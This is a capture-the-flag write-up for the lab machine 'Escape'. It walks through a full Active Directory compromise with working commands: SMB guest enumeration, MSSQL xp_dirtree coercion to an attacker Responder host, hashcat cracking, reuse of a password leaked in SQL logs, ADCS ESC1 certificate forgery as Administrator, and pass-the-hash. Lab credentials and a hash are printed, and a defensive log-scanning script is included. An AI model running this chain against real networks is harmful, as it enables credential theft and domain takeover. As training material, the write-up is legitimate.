Escape
Overview
Escape chains together a publicly accessible SMB share leaking credentials, MSSQL NTLM hash capture via Responder, a leaked password in SQL Server logs, and finally ADCS certificate abuse (ESC1) to forge a certificate as Administrator. A solid Active Directory path with real-world misconfiguration patterns.
Recon
Nmap
```shell
sudo nmap -sC -sV -vv -oA tcp 10.129.34.131 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.34.131
```
Open ports include SMB (445), MSSQL (1433), WinRM (5985), and RDP (3389). The presence of MSSQL alongside SMB is the primary attack surface.
SMB - Guest Enumeration
Check accessible shares as an anonymous/guest user using NetExec:
```shell
nxc smb 10.129.34.131 -u anonymous -p "" --shares
```
A Public share is readable without authentication. Connect with impacket-smbclient to browse it:
Inside the share, a file contains a plaintext username and password:
Credentials found: PublicUser:GuestUserCantWrite1
Foothold
MSSQL - NTLM Hash Capture
Use the discovered credentials to connect to MSSQL:
```shell
impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.129.34.131
```
From within MSSQL, force an outbound authentication attempt to our machine using xp_dirtree or xp_fileexist. This coerces the MSSQL service account (sql_svc) to authenticate to our Responder listener, leaking its NTLMv2 hash.
Start Responder on tun0 before triggering the connection:
```shell
sudo responder -I tun0
```
Then in the MSSQL session:
```sql
EXEC xp_dirtree '\\10.10.14.X\share', 1, 1
```
Responder captures the NTLMv2 hash for sql_svc. Crack it offline with hashcat (mode 5600 = NTLMv2):
```shell
hashcat -a 0 -m 5600 sql_svc_hash /mnt/hgfs/I/data/rockyou.txt
```
Cracked credentials: sql_svc:REGGIE1234ronnie
WinRM Shell
With the cracked password, authenticate via Evil-WinRM:
```shell
evil-winrm-py -i 10.129.34.131 -u sql_svc -p REGGIE1234ronnie
```
Privilege Escalation
Credential Discovery in SQL Server Logs
Enumerate domain users from WinRM:
Browse C:\SQLServer\Logs - SQL Server error logs record failed login attempts, including cases where a user accidentally typed their password into the username field:
A cleartext password for Ryan.Cooper is visible in the log. Test it:
```shell
evil-winrm-py -i 10.129.34.131 -u Ryan.Cooper -p NuclearMosquito3
```
It works.
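The same pattern is easy to hunt for from the defender's side. This is an added example, not part of the original writeup: it scans SQL Server ERRORLOG lines for "Logon failed" entries whose "user" is not a known principal (the signature of a password typed into the username field) and ties each hit to the next successful login from the same client. The log lines and the principal list are constructed for illustration.

```python
import re

# Constructed sample lines in the SQL Server ERRORLOG layout (illustrative, not from the box).
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.12 Logon       Logon failed for user 'sequel\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2022-11-18 13:43:09.01 Logon       Login succeeded for user 'sequel\\Ryan.Cooper'. Connection made using Windows authentication. [CLIENT: 10.0.0.5]
2022-11-18 13:44:00.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""

FAILED = re.compile(
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) \[CLIENT: (?P<client>[^\]]+)\]"
)
SUCCEEDED = re.compile(r"Login succeeded for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]")


def find_password_in_username(log_text, known_principals):
    """Return suspected credential leaks from an ERRORLOG text.

    A failure whose 'user name' is not a known login and whose reason is
    'Could not find a login matching the name provided' is the writeup's
    pattern: a password landed in the username field. The report carries the
    line number and the value's length, never the value itself, so the
    finding can be shared without re-leaking the secret. likely_owner is the
    next account that logged in successfully from the same client address.
    """
    known = {p.lower() for p in known_principals}
    lines = log_text.splitlines()
    findings = []
    for i, line in enumerate(lines):
        m = FAILED.search(line)
        if not m:
            continue
        name = m.group("user").split("\\")[-1]  # drop an optional DOMAIN\ prefix
        if name.lower() in known or "Could not find a login" not in m.group("reason"):
            continue
        owner = None
        for later in lines[i + 1:]:
            s = SUCCEEDED.search(later)
            if s and s.group("client") == m.group("client"):
                owner = s.group("user")
                break
        findings.append({"line": i + 1, "client": m.group("client"),
                         "value_length": len(name), "likely_owner": owner})
    return findings


if __name__ == "__main__":
    for f in find_password_in_username(SAMPLE_ERRORLOG, ["Ryan.Cooper", "sa", "sql_svc"]):
        print(f"line {f['line']}: {f['value_length']}-char unknown login from {f['client']}, "
              f"likely owner {f['likely_owner']}")
```

Flagged lines are a prompt to rotate the affected account's password and to tighten read access on the log directory, which in this case was readable by a low-privileged service account.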
Interesting Privilege
Ryan has SeMachineAccountPrivilege - the ability to add computer accounts to the domain. This becomes relevant for ADCS attacks that require a machine account.
ADCS - ESC1 (Vulnerable Certificate Template)
Enumerate ADCS templates for misconfigurations using certipy-ad:
```shell
certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -dc-ip 10.129.102.161 -enabled -vulnerable
```
The UserAuthentication template is vulnerable to ESC1 - it allows the requester to specify an arbitrary Subject Alternative Name (SAN), meaning we can request a certificate that authenticates as any user, including Administrator.
Request a Certificate as Administrator
```shell
certipy-ad req -ca 'sequel-DC-CA' -u 'Ryan.Cooper' -p NuclearMosquito3 \
  -dc-ip 10.129.102.161 -template 'UserAuthentication' \
  -upn 'administrator@sequel.htb' -target 'dc.sequel.htb'
```
Authenticate with the Certificate
```shell
certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.102.161
```
Clock Skew Error: Kerberos requires clock synchronisation within 5 minutes. If you get a KRB_AP_ERR_SKEW error:
Fix it by disabling NTP and syncing to the DC:
```shell
timedatectl set-ntp false
rdate -n 10.129.34.131
```
Certipy-ad returns the Administrator's NTLM hash. Pass-the-Hash via Evil-WinRM:
```shell
evil-winrm-py -i 10.129.34.131 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
```
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMB guest enumeration | PublicUser:GuestUserCantWrite1 |
| Hash capture | MSSQL xp_dirtree → Responder | sql_svc NTLMv2 hash |
| Credential access | hashcat | sql_svc:REGGIE1234ronnie |
| Foothold | Evil-WinRM as sql_svc | Initial shell |
| Credential discovery | SQL Server log review | Ryan.Cooper:NuclearMosquito3 |
| Privesc | ADCS ESC1 cert → Administrator hash | Administrator NTLM |
| Root | Evil-WinRM PtH | Root flag |